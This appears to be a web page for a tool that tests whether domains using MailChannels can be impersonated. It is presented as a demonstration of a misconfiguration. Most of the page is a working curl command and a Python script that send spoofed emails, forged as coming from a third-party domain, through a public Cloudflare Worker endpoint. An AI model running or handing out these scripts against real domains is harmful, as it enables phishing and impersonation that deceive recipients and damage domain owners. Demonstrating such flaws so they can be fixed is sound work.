For more info see this blog post. The code for this Cloudflare Worker is here.
Use the below form to send an email and test if a domain using MailChannels is misconfigured and can be impersonated.
For a complete list of options see the MailChannels Transactional API docs.
The below examples will send a spoofed email from churchofsatan.com.
Curl:
curl -X POST \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
"https://spamchannel.haxxx.workers.dev/" \
-d '{
"personalizations" : [ {
"to" : [{
"name" : "",
"email" : "my@email.com"
}]}],
"from": { "email":"lucifer@churchofsatan.com", "name": "Lucifer"},
"subject" : "Hell is hot",
"content" : [{
"type" : "text/plain",
"value" : "Send aircon hot af down here"
}]
}'
Python:
#! /usr/bin/env python3
# This sends an HTML email
# Example: python spam.py myemail.html
import sys
import requests
sender_email = 'satan@churchofsatan.com'
receiver_email = 'me@email.com'
with open(sys.argv[1], 'r') as email_html_file:
email_html = email_html_file.read()
email_json = {
"personalizations": [
{
"to": [
{
"email": receiver_email,
}
]
}
],
"from": {
"email": sender_email,
"name": "Lucifer"
},
"subject": "Hell is hot",
"content": [
{
"type": "text/html",
"value": email_html
}
]
}
print(f"Sending to {receiver_email} from {sender_email}")
r = requests.post(
'https://spamchannel.haxxx.workers.dev/',
json=email_json
)
print(r.text, r.status_code)